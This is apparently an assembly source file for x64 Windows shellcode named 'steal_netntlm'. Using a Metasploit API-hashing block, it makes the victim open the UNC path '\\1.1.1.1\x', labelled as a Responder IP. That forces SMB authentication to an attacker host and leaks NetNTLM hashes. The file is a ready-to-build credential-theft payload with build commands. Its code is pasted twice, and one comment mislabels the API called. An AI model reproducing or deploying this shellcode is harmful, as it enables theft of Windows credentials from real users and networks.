EgeBalci/steal_netntlm_x64.asm

## steal_netntlm_x64.asm
;-----------------------------------------------------------------------------;
; Author: Ege Balcı (egebalci[at]pm[dot]me)
; Compatible: All Windows versions with SMBv2/v1
; Architecture: x64
; Size: 265 + strlen(IP) + 1
; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode
;-----------------------------------------------------------------------------;

[BITS 64]
[ORG 0]

	cld                      ; Clear the direction flag.
	call start               ; Call start, this pushes the address of 'api_call' onto the stack.
	%include "block_api.asm" ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
start:                       ;
	pop rbp                  ; Pop off the address of 'api_call' for calling later.
	call get_api             ;
	db "\\1.1.1.1\x",0       ; Responder IP address
get_api:                     ;
	pop rcx                  ; Pop IP string address to RCX
	mov r10d, 0x13DD2ED7     ; hash( "kernel32.dll", "WinExec" )
	call rbp                 ; DeleteFile("\\1.1.1.1\x");
exitfunk:                    ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x64/src/block/block_exitfunk.asm
	mov ebx, 0x0A2A1DE0      ; The EXITFUNK as specified by user...
	mov r10d, 0x9DBD95A6     ; hash( "kernel32.dll", "GetVersion" )
	call rbp                 ; GetVersion(); (AL will = major version and AH will = minor version)
	add rsp, 40              ; cleanup the default param space on stack
	cmp al, byte 6           ; If we are not running on Windows Vista, 2008 or 7
	jl short goodbye         ; Then just call the exit function...
	cmp bl, 0xE0             ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
	jne short goodbye        ;
	mov ebx, 0x6F721347      ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye:                     ; We now perform the actual call to the exit function
	push byte 0              ;
	pop rcx                  ; set the exit function parameter
	mov r10d, ebx            ; place the correct EXITFUNK into r10d
	call rbp                 ; call EXITFUNK( 0 );i
	;-----------------------------------------------------------------------------;
	; Author: Ege Balcı (egebalci[at]pm[dot]me)
	; Compatible: All Windows versions with SMBv2/v1
	; Architecture: x64
	; Size: 265 + strlen(IP) + 1
	; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode
	;-----------------------------------------------------------------------------;

	[BITS 64]
	[ORG 0]

	cld ; Clear the direction flag.
	call start ; Call start, this pushes the address of 'api_call' onto the stack.
	%include "block_api.asm" ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
	start: ;
	pop rbp ; Pop off the address of 'api_call' for calling later.
	call get_api ;
	db "\\1.1.1.1\x",0 ; Responder IP address
	get_api: ;
	pop rcx ; Pop IP string address to RCX
	mov r10d, 0x13DD2ED7 ; hash( "kernel32.dll", "WinExec" )
	call rbp ; DeleteFile("\\1.1.1.1\x");
	exitfunk: ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x64/src/block/block_exitfunk.asm
	mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
	mov r10d, 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
	call rbp ; GetVersion(); (AL will = major version and AH will = minor version)
	add rsp, 40 ; cleanup the default param space on stack
	cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
	jl short goodbye ; Then just call the exit function...
	cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
	jne short goodbye ;
	mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
	goodbye: ; We now perform the actual call to the exit function
	push byte 0 ;
	pop rcx ; set the exit function parameter
	mov r10d, ebx ; place the correct EXITFUNK into r10d
	call rbp ; call EXITFUNK( 0 );i